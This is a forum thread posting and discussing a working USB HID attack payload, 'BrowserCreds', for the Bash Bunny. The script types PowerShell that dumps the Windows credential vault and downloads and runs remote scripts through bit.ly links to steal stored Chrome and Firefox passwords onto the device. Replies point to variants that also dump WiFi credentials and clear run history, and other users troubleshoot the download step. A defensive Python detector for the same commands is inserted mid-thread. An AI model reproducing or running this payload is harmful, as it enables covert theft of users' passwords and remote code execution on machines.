illwill Posted March 16, 2017 (edited)
Violation of CoC
Edited October 8, 2017 by illwill

Mohamed A. Baset Posted March 16, 2017

13 minutes ago, illwill said:

Was thinking of ways to dump browsercreds without the use of Nirsoft programs, so screwing around with some powershell and some scripts I found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute and store the results \loot\BrowserCreds\%computername%.txt. Tested on Win10 with Delays that worked for my laptop, so may need adjusting, let me know of any errors you come across

https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt

#!/bin/bash
#
# Title: BrowserCreds
# Author: illwill
# Version: 0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
#script
# Blue...............Running Script
# Purple.............Got Browser Creds
LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000
#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
LED R B 200
sync

Cool script @illwill but it's preferred to use sync before LEDding

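For defenders, the commands typed by the payload quoted above leave recognizable text in PowerShell Script Block Logging (event ID 4104). The following is an added example, not code from the thread or from the payload's authors: it matches those patterns in script-block text and flags hosts that show more than one of them. The event shape (dicts with `host` and `text`), the host names, the URLs, the indicator names and the threshold are all constructed for illustration.

```python
import re
from collections import defaultdict

# Indicators derived from the commands the payload quoted above types.
INDICATORS = {
    # IEX (New-Object Net.WebClient).DownloadString(...): script fetched and run in memory
    "download_cradle": re.compile(
        r"\bIEX\b.*New-Object\s+Net\.WebClient.*\.DownloadString\(", re.I | re.S),
    # PasswordVault RetrieveAll() followed by RetrievePassword(): vault dump
    "vault_dump": re.compile(
        r"Credentials\.PasswordVault.*RetrieveAll\(\).*RetrievePassword\(\)", re.I | re.S),
    # WMI lookup of a volume by the device's label to find the loot drive
    "volume_label_lookup": re.compile(
        r"win32_volume\b.*label\s*=\s*'*BashBunny", re.I | re.S),
    # Function names exposed by the downloaded scripts
    "creds_function": re.compile(r"\bGet-(ChromeCreds|FoxDump)\b", re.I),
}

def indicators_in(script_text):
    """Return the sorted names of the indicators found in one script block."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_text))

def triage(events, threshold=2):
    """Flag hosts whose script blocks show >= threshold distinct indicators.

    A lone download cradle is common in admin tooling, so one hit is not enough.
    """
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(indicators_in(ev["text"]))
    return {h: sorted(s) for h, s in seen.items() if len(s) >= threshold}

# Constructed sample events (host names and URLs are made up).
SAMPLE_EVENTS = [
    {"host": "WS-014", "text": "$Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)"},
    {"host": "WS-014", "text": "$VaultObj = new-object Windows.Security.Credentials.PasswordVault; $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }"},
    {"host": "WS-014", "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1'); Get-ChromeCreds | ft -AutoSize"},
    {"host": "WS-022", "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/install.ps1')"},
    {"host": "WS-031", "text": "Get-ChildItem C:\\Users | Select-Object Name"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, hits)
```

In the sample, only WS-014 is flagged; WS-022 shows a download cradle alone and stays below the threshold.
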
illwill (Author) Posted March 16, 2017 (edited)
Violation of CoC
Edited October 8, 2017 by illwill

qdba Posted March 20, 2017 (edited)

Good stuff. Did some changes to your script like
- Minimize Powershell windows
- Dump WiFi creds
- Clear Run History

https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt

Edited March 20, 2017 by qdba

henna3 Posted March 20, 2017

1 hour ago, qdba said:

Good stuff. Did some changes to your script like
- Minimize Powershell windows
- Dump WiFi creds
- Clear Run History

https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt

You have one for the usb rubber ducky as well? Hehe

Epoc Posted March 20, 2017

12 minutes ago, henna3 said:

You have one for the usb rubber ducky aswell? Hehe

Here's what you're looking for:

calin42 Posted May 17, 2017

Hello, I have this problem:

Get-ChromeCreds : Le terme «Get-ChromeCreds» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin d'accès est correct et réessayez.
Au caractère Ligne:2 : 73
+ ... ent).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds | ft Us ...
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Get-ChromeCreds:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

So, I isolated the problem: this line: "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds" And it's working perfectly. But not with the script.

Little translation, it says that Get-ChromeCreds is not a valid function, which I think means he failed to download. But idk why it's working when I execute the line myself, and not when the script does it.

Thx for help :)

HeadScratchCode Posted June 4, 2017

I think I'm having the same issue as the comment above, but I'm unsure how to fix it. Successfully continuing past the IEX string fails. The image below displays the problem. Would be grateful for any help in finding a solution. Thanks, guys.

b0N3z Posted June 23, 2017

If you go to the github, dumpcreds 2.2 is in the pull request section and it works great for browser creds. :)